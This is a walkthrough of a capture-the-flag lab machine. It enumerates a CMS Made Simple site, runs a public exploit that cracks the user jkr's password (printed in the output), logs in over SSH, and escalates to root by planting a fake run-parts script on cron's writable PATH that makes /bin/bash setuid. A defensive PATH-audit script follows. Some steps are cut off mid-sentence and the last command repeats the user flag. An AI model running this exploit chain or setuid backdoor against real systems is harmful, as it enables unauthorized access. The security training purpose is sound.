First of all, we need to enumerate and scan the open ports. Follow the steps below:
#nmap -sV -p- -v 10.10.10.138 -oA nmap
Check the commands used for the initial enumeration:
As we have an open port 80, let's check what service/website is hosted on it.
# echo -e "10.10.10.138\twriteup.htb" >> /etc/hosts
$ dirb http://writeup.htb/ /usr/share/wordlists/dirb/common.txt > dirb.txt
Among the results is http://writeup.htb/robots.txt, with a Disallow rule for the "writeup" subdirectory.
Next, visit http://writeup.htb/writeup/ and fingerprint the site with the Wappalyzer browser extension, or in CLI mode with the whatweb command like this:
# whatweb http://writeup.htb/writeup/
We need to get shell access, so let's check some interesting points and find out how to exploit them.
# searchsploit "CMS Made Simple"
# ./exploit.py -u http://10.10.10.138/writeup --crack --wordlist /usr/share/wordlists/rockyou.txt
Salt for password found: 5a599ef579066807 | Username found: jkr | Email found: email@example.com | Password found: 62def4866937f08cc13bab43bb14e6f7 | Password cracked: raykayjay9
# ssh firstname.lastname@example.org
$ cat user.txt
We have access to the user shell and we already got the user flag. But we still need to gain root access to catch the root flag.
In /usr/local, we can find directories/subdirectories writable by the group "staff", of which the current user (jkr) is also a member.
In /etc/crontab, we can find some rules pointing to
That way, we can override the "run-parts" path with a custom script in
$ echo -e '#!/bin/bash\n\nchmod +s /bin/bash' > /usr/local/bin/run-parts; chmod +x /usr/local/bin/run-parts
$ cat user.txt
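The privilege escalation above works because a directory on cron's PATH is writable by a non-root group. Below is an added audit script, not part of the original write-up, that checks each directory in a PATH string (for example the PATH= line of /etc/crontab) for group- or world-writable entries; the directory names and modes in make_demo_path are constructed for the demo and only mirror the /usr/local/bin condition described above.

```shell
#!/bin/sh
# Added example: report PATH directories a non-root user could write to.
# A writable directory that precedes the real location of run-parts is the
# condition the cron hijack relies on, so this is the check to run after fixing it.

# Print one line per group/world-writable directory in the PATH given as $1.
# Exit status: 0 when every directory is clean, 1 when at least one is risky.
audit_path_dirs() {
    old_ifs=$IFS
    IFS=:
    set -- $1                             # split the PATH on ':' without a subshell
    IFS=$old_ifs
    risky=0
    for dir in "$@"; do
        [ -d "$dir" ] || continue         # skip entries that do not exist
        perms=$(ls -ld "$dir" | cut -c1-10)  # e.g. drwxrwsr-x
        grp_w=$(printf '%s' "$perms" | cut -c6)   # group write bit
        oth_w=$(printf '%s' "$perms" | cut -c9)   # other write bit
        if [ "$grp_w" = w ] || [ "$oth_w" = w ]; then
            owner=$(ls -ld "$dir" | awk '{print $3 ":" $4}')
            printf 'WRITABLE %s %s %s\n' "$dir" "$perms" "$owner"
            risky=1
        fi
    done
    return $risky
}

# Constructed demo layout (hypothetical, not from the box): one directory with
# the default mode and one setgid + group-writable like /usr/local/bin was.
# Prints the PATH string to audit; a non-existent entry is included on purpose.
make_demo_path() {
    base=$(mktemp -d)
    mkdir "$base/safe_bin" "$base/staff_bin"
    chmod 755 "$base/safe_bin"
    chmod 2775 "$base/staff_bin"
    printf '%s:%s:/nonexistent_dir' "$base/staff_bin" "$base/safe_bin"
}

# Usage on a real host: audit_path_dirs "$(grep '^PATH=' /etc/crontab | cut -d= -f2-)"
demo=$(make_demo_path)
audit_path_dirs "$demo" || echo "PATH contains writable directories; fix before trusting cron"
```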